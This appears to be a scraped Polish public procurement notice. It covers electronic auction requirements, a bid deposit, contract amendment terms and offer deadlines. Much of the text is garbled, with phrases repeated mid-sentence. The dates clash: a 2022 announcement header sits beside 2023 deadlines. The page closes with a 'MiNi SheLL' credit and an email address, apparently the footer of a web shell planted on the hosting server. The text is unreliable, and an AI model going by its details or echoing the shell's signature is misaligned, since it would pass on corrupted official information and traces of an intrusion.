Portalu Aukcji<br/>Publicznych, na adres eadres e-mail Wykonawcy, wskazany w formularzu ofertowym.<br/>2.2. Zalecane wymagania techniczne urządzeń informatycznych użytych do udziału w aukcji<br/>elektronicznej, zapewniające stabilne współdziałanie z Portalem Aukcji Publicznych:z Portalem<br/>Aukcji Publicznych:<br/>a) Szerokopasmowe łącze internetowe,we łącze internetowe,<br/>b) Komputer klasy PC z jednym z następujących systemów operacyjnych: systemów<br/>operacyjnych: Windows XP, Windows Vista, Windows 7, Windows 8, Windows 10 (bez wsparcia<br/>dla Windows XP);<br/>c) Stabilne wersje (bez wsparcia dla wersji beta) przeglądarki internetowej Internet Explorer w<br/>wersji od 9 do 11. Przeglądarka internetowa musi mieć włączoną obsługę JavaScript oraz<br/>zainstalowane darmowe oprogramowanie Java (JRE) – zgodnie z zaleceniami ze strony<br/>dostawcy Java,<br/>d) Ważny podpis elektroniczny zweryfikowany kwalifikowanym certyfikatem wydanym przez<br/>jedno z następujących centr cecertyfikacji:<br/>• Cencert,<br/>• Krajowa Izba Rozliczeniowa S.A.,wa S.A.,<br/>Ogłoszenie nr 2022/BZP 00033559/01 z dnia 2022-01-25<br/>2022-01-25 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy - Roboty budowlane<br/>• PWPW,<br/>• Certum<br/>• EuroCert.<br/>e) Urządzenie techniczne służące do obsługi podpisu elektronicznego Urządzenie techniczne<br/>służące do obsługi podpisu elektronicznego weryfikowanego ważnym kwalifikowanym<br/>certyfikatem,weryfikowanego ważnym kwalifikowanym certyfikatem,<br/>f) Minimalna rozdzielczość ekranu wymagana do poprawnego wyświetlania portalu to 1366x768<br/>g) Wszelkie szczegółowe informacje dotyczące w/w warunków Wykonawca znajdzie na stronie<br/>https://laip--srk.coig.biz w dziale „Informacje podstawowe” oraz instrukcji obsługi w dziale<br/>„Instrukcja obsługi” (dostępnej po zalogowaniu).<br/>3 Administrator nie ponosi odpowiedzialności za nieprawidłowości wynikające z korzystania<br/>przez Uczestników z oprogramowania innego niż zalecane.<br/>4 Akceptacja regulaminu Portalu Aukcji Publicznych jest elementem wymaganym w trakcie<br/>pierwszego logowania oraz po każdorazowej zmianie regulaminu Portalu.<br/>5. Wykonawca ma możliwość zalogowania do Portalu Aukcji Publicznych, przeprowadzenia<br/>testu podpisu kwalifikowanego oraz udziału w stałej aukcji testowej od momentu otrzymania<br/>wraz z zaproszeniem poufnego identyfikatora (komplet login-hasło).<br/>6 W przypadku, gdy Wykonawca posiada podpis elektroniczny wystawiony przez zagraniczne<br/>centrum certyfikacji, jest on zobligowany do dostarczenia Administratorowi wzoru takiego<br/>podpisu w terminie nie krótszym niż 10 dni przed rozpoczęciem aukcji. <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> Wykonawca przystępujący do postępowania zobowiązany jest do wniesienia wadium na całość przedmiotu zamówienia w kwocie: 3 000,00 złotych (słownie: trzy tysiące złotych 00/100). <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> OKOLICZNOŚCI ZMIANY UMOWY<br/>Zamawiający przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w przypadkach wynikających wprost z przepisów ustawy Prawo zamówień publicznych, w szczególności z art. 455 oraz w przypadku wystąpienia co najmniej jednej z okoliczności wymienionych w §23 załącznika nr 2 do SWZ (PROJEKTOWANE POSTANOWIENIA UMOWNE) <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-04-06 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem Platformy Zakupowej działającej pod adresem: https://efo.coig.biz poprzez Elektroniczny Formularz Ofertowy</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-04-06 10:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-05-05</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com